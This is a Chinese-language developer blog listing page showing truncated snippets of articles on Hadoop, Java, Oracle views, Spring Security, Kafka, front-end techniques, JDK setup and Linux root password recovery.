     结合网上多份文档,不断反复的修正hadoop启动和运行过程中出现的问题,终于把Hadoop2.5.2伪分布式安装起来,跑通了wordcount例子。Hadoop的安装复杂性的体现之一是,Hadoop的安装文档非常多,但是能一个文档走下来的少之又少,尤其是Hadoop不同版本的配置差异非常的大。Hadoop2.5.2于前两天发布,但是它的配置跟2.5.0,2.5.1没有分别。 &nb
  • Anychart图表系列五之事件监听 白糖_ chart
    创建图表事件监听非常简单:首先是通过addEventListener('监听类型',js监听方法)添加事件监听,然后在js监听方法中定义具体监听逻辑。 以钻取操作为例,当用户点击图表某一个point的时候弹出point的name和value,代码如下: <script> //创建AnyChart var chart = new AnyChart(); //添加钻取操作&quo
  • Web前端相关段子 braveCS web前端
    Web标准:结构、样式和行为分离   使用语义化标签 0)标签的语义:使用有良好语义的标签,能够很好地实现自我解释,方便搜索引擎理解网页结构,抓取重要内容。去样式后也会根据浏览器的默认样式很好的组织网页内容,具有很好的可读性,从而实现对特殊终端的兼容。 1)div和span是没有语义的:只是分别用作块级元素和行内元素的区域分隔符。当页面内标签无法满足设计需求时,才会适当添加div
  • 编程之美-24点游戏 bylijinnan 编程之美
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashSet; import java.util.List; import java.util.Random; import java.util.Set; public class PointGame { /**编程之美
  • 主页面子页面传值总结 chengxuyuancsdn 总结
    1、showModalDialog returnValue是javascript中html的window对象的属性,目的是返回窗口值,当用window.showModalDialog函数打开一个IE的模式窗口时,用于返回窗口的值 主界面 var sonValue=window.showModalDialog("son.jsp"); 子界面 window.retu
  • [网络与经济]互联网+的含义 comsci 互联网+
          互联网+后面是一个人的名字 = 网络控制系统       互联网+你的名字 =  网络个人数据库       每日提示:如果人觉得不舒服,千万不要外出到处走动,就呆在床上,玩玩手游,更不能够去开车,现在交通状况不
  • oracle 创建视图 with check option daizj 视图vieworalce
    我们来看下面的例子: create or replace view testview as select empno,ename from emp where ename like ‘M%’ with check option; 这里我们创建了一个视图,并使用了with check option来限制了视图。 然后我们来看一下视图包含的结果: select * from testv
  • ToastPlugin插件在cordova3.3下使用 dibov Cordova
        自己开发的Todos应用,想实现“ 再按一次返回键退出程序 ”的功能,采用网上的ToastPlugins插件,发现代码或文章基本都是老版本,运行问题比较多。折腾了好久才弄好。下面吧基于cordova3.3下的ToastPlugins相关代码共享。       ToastPlugin.java package&nbs
  • C语言22个系统函数 dcj3sjt126com cfunction
    C语言系统函数一、数学函数下列函数存放在math.h头文件中Double floor(double num) 求出不大于num的最大数。Double fmod(x, y) 求整数x/y的余数。Double frexp(num, exp); double num; int *exp; 将num分为数字部分(尾数)x和 以2位的指数部分n,即num=x*2n,指数n存放在exp指向的变量中,返回x。D
  • 开发一个类的流程 dcj3sjt126com 开发
    本人近日根据自己的开发经验总结了一个类的开发流程。这个流程适用于单独开发的构件,并不适用于对一个项目中的系统对象开发。开发出的类可以存入私人类库,供以后复用。   以下是开发流程: 1. 明确类的功能,抽象出类的大概结构 2. 初步设想类的接口 3. 类名设计(驼峰式命名) 4. 属性设置(权限设置) 判断某些变量是否有必要作为成员属
  • java 并发 shuizhaosi888 java 并发
    能够写出高伸缩性的并发是一门艺术   在JAVA SE5中新增了3个包 java.util.concurrent java.util.concurrent.atomic java.util.concurrent.locks 在java的内存模型中,类的实例字段、静态字段和构成数组的对象元素都会被多个线程所共享,局部变量与方法参数都是线程私有的,不会被共享。
  • Spring Security(11)——匿名认证 234390216 Spring SecurityROLE_ANNOYMOUS匿名
    匿名认证 目录 1.1     配置 1.2     AuthenticationTrustResolver          对于匿名访问的用户,Spring Security支持为其建立一个匿名的AnonymousAuthenticat
  • NODEJS项目实践0.2[ express,ajax通信...] 逐行分析JS源代码 Ajaxnodejsexpress
      一、前言         通过上节学习,我们已经        ubuntu系统搭建了一个可以访问的nodejs系统,并做了nginx转发。本节原要做web端服务 及 mongodb的存取,但写着写着,web端就
  • 在Struts2 的Action中怎样获取表单提交上来的多个checkbox的值 lhbthanks javahtmlstrutscheckbox
    第一种方法:获取结果String类型 在 Action 中获得的是一个 String 型数据,每一个被选中的 checkbox 的 value 被拼接在一起,每个值之间以逗号隔开(,)。 所以在 Action 中定义一个跟 checkbox 的 name 同名的属性来接收这些被选中的 checkbox 的 value 即可。 以下是实现的代码: 前台 HTML 代码:
  • 003.Kafka基本概念 nweiren hadoopkafka
    Kafka基本概念:Topic、Partition、Message、Producer、Broker、Consumer。 Topic:             消息源(Message)的分类。 Partition:             Topic物理上的分组,一
  • Linux环境下安装JDK roadrunners jdklinux
    1、准备工作 创建JDK的安装目录: mkdir -p /usr/java/   下载JDK,找到适合自己系统的JDK版本进行下载: http://www.oracle.com/technetwork/java/javase/downloads/index.html   把JDK安装包下载到/usr/java/目录,然后进行解压: tar -zxvf jre-7
  • Linux忘记root密码的解决思路 tomcat_oracle linux
    1:使用同版本的linux启动系统,chroot到忘记密码的根分区passwd改密码   2:grub启动菜单中加入init=/bin/bash进入系统,不过这时挂载的是只读分区。根据系统的分区情况进一步判断.   3: grub启动菜单中加入 single以单用户进入系统.   4:用以上方法mount到根分区把/etc/passwd中的root密码去除   例如:   ro
  • 跨浏览器 HTML5 postMessage 方法以及 message 事件模拟实现 xueyou jsonpjquery框架UIhtml5
    postMessage 是 HTML5 新方法,它可以实现跨域窗口之间通讯。到目前为止,只有 IE8+, Firefox 3, Opera 9, Chrome 3和 Safari 4 支持,而本篇文章主要讲述 postMessage 方法与 message 事件跨浏览器实现。postMessage 方法 JSONP 技术不一样,前者是前端擅长跨域文档数据即时通讯,后者擅长针对跨域服务端数据通讯,p
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他